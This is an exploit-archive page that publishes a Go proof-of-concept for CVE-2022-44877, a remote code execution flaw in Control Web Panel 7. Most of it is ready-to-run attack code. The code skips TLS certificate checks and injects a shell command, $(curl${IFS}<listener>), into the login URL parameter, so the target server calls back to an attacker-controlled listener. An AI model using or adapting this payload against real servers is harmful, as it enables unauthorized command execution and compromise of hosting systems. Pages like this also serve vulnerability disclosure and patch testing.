exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Control Web Panel 7 (CWP7) 0.9.8.1147 Remote Code Execution

Control Web Panel 7 (CWP7) 0.9.8.1147 Remote Code Execution
Posted Apr 6, 2023
Authored by Mayank Deshmukh

Control Web Panel 7 (CWP7) version 0.9.8.1147 suffers from a remote code execution vulnerability.

tags | exploit, remote, web, code execution
advisories | CVE-2022-44877
SHA-256 | 5ba6eecbfef39e064bb411b47384051a649ebeb089d2d5dc712466ec696fe755

Control Web Panel 7 (CWP7) 0.9.8.1147 Remote Code Execution

Change Mirror Download
// Exploit Title: Control Web Panel 7 (CWP7) v0.9.8.1147 -  Remote Code Execution (RCE)
// Date: 2023-02-02
// Exploit Author: Mayank Deshmukh
// Vendor Homepage: https://centos-webpanel.com/
// Affected Versions: version < 0.9.8.1147
// Tested on: Kali Linux
// CVE : CVE-2022-44877
// Github POC: https://github.com/ColdFusionX/CVE-2022-44877-CWP7

// Exploit Usage : go run exploit.go -u https://127.0.0.1:2030 -i 127.0.0.1:8020

package main

import (
"bytes"
"crypto/tls"
"fmt"
"net/http"
"flag"
"time"
)

func main() {

var host,call string
flag.StringVar(&host, "u", "", "Control Web Panel (CWP) URL (ex. https://127.0.0.1:2030)")
flag.StringVar(&call, "i", "", "Listener IP:PORT (ex. 127.0.0.1:8020)")

flag.Parse()

banner := `
-= Control Web Panel 7 (CWP7) Remote Code Execution (RCE) (CVE-2022-44877) =-
- by Mayank Deshmukh (ColdFusionX)

`
fmt.Printf(banner)
fmt.Println("[*] Triggering cURL command")

fmt.Println("[*] Open Listener on " + call + "")

//Skip certificate validation
tr := &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
}
client := &http.Client{Transport: tr}

// Request URL
url := host + "/login/index.php?login=$(curl${IFS}" + call + ")"

// Request body
body := bytes.NewBuffer([]byte("username=root&password=cfx&commit=Login"))

// Create HTTP client and send POST request
req, err := http.NewRequest("POST", url, body)
req.Header.Add("Content-Type", "application/x-www-form-urlencoded")
resp, err := client.Do(req)
if err != nil {
fmt.Println("Error sending request:", err)
return
}
time.Sleep(2 * time.Second)

defer resp.Body.Close()
fmt.Println("\n[*] Check Listener for OOB callback")
}

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close